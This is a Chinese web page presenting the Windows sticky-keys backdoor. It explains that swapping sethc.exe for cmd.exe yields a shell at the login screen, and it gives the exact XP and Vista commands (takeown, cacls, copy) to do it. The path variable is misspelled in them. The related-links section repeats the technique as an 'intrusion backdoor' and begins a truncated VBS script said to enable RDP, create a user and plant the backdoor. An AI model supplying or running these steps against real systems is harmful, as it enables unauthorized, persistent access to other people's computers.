WINDOWS漏洞:粘置键

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

(0)

相关推荐

  • WINDOWS漏洞:粘置键

    在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. 参考McafeeAvertLabs: http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/ XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dll

  • 简析Windows Vista内置防火墙图文教程

    早在Windows 2000系统的扩展工具包中就出现了ICF(Internet Connection Firewall)工具,通过它可以配置网络数据包的传入规则,但是在Windows 2000中这个ICF工具没有内置到系统中.因此说起Windows系统自带的防火墙要追溯到XP系统,在XP和XP SP1系统中内置了一个名为Internet Connection Firewall的组件,它提供了基本的包过滤功能,这就是系统防火墙的前身. 到了XP SP2发布后这个ICF就名正言顺地成为了Window

  • 可自删除 开启3389创建用户粘滞键后门的vbs

    on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv"

  • Win2003服务器系统文件权限设置小结

    不多说了,下面将说明需要设置权限的系统文件,设置为只有Administrators组可以访问,并且拒绝Guests组访问. "%SystemDrive%/boot.ini" Windows主要依赖Boot.ini文件来确定计算机在重启(引导)过程中显示的可供选取的操作系统类别 "%SystemDrive%/AUTOEXEC.BAT" 装有DOS或 Windows操作系统的计算机在启动的 时候,都要自动执行 AUTOEXEC.BAT 批处理文件 "%Syst

  • 变态入侵之有史以来最酷的Windows后门sethc.exe

    后门原理: 在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. XP: 将安装源光盘弹出(或将硬盘上的安装目录改名)  cd %widnir%\system32\dllcache  ren sethc.exe *.ex~  cd %widnir%\system32  copy /y cmd.exe sethc.exe V

  • 轻松设置拒绝windows 2003泄密

    一直以来,Windows 2003系统是大家公认在安全方面做得比较好的操作系统,以致于很多人在使用了Windows 2003操作系统后就认为自己的系统安全已经"高枕无忧"了.可事实并非如此,细心的朋友可能会发现,Windows 2003系统在给人们带来强大稳定性的同时,其缺省设置同样也存在安全隐患!为此,我们有必要对Windows 2003缺省设置进行适当调整,以便让系统"拒绝"对外泄密. 大家知道,在默认状态下Windows 2003系统会将你输入的密码内容自做主

  • Windows XP终极设置之系统优化篇

    一.系统优化设置. 1.删除Windows强加的附件: 1) 用记事本NOTEPAD修改winntinfsysoc.inf,用檎?替换功能,在查找框中输入,hide(一个英文逗号紧跟hide),将"替换为"框设为空.并选全部替换,这样,就把所有的,hide都去掉了, 2) 存盘退出, 3)再运行"添加-删除程序",就会看见"添加/删除 Windows 组件"中多出了好几个选项:这样你可以删除好些没有用的附件. 2.关掉调试器Dr. Watson:

  • WINDOWS XP终极设置(呕心沥血版)第1/2页

    WINDOWS XP终极设置WINDOWS XP终极设置(呕心沥血版) 声明:以上资料均是从从互联网上搜集整理而来,本人未曾一一测试,所以在改动时要小心,做好备份,有备无患么,呵呵. 一.系统优化设置. 1.删除Windows强加的附件:  1) 用记事本NOTEPAD修改\winnt\inf\sysoc.inf,用查找/替换功能,在查找框中输入,hide(一个英文逗号紧跟hide),将"替换为"框设为空.并选全部替换,这样,就把所有的,hide都去掉了, 2) 存盘退出, 3)再运行

  • Windows快捷键大全

    Windows快捷键大全 一.常用快捷键 F1 显示当前程序或者Windows的帮助内容. F2 当你选中一个文件的话,这意味着"重命名" F3 当你在桌面上的时候是打开"查找:所有文件" 对话框 F10或ALT激活当前程序的菜单栏 windows键或CTRL+ESC 打开开始菜单 CTRL+ALT+DELETE 在win9x中打开关闭程序对话框 DELETE 删除被选择的选择项目,如果是文件,将被放入回收站 SHIFT+DELETE删除被选择的选择项目,如果是文件

  • Windows api关于注册表的操作经验和总结

    读取注册表常用的函数 RegOpenKeyEx 用于打开一个键 RegSetValueEx 用于设置一个键的键值 RegQueryValueEx 用于读取一个键的值 RegCloseKey 用于关闭RegOpen打开的键 RegQueryValueEx通常连用两次来读取键值,第一次只读取键的大小,然后分配内存,然后再用一次RegQueryValueEx来读取键值到buffer. 下面是一个读取windows下的path键值的例子 HKEY hk; int result = RegOpenKeyE

随机推荐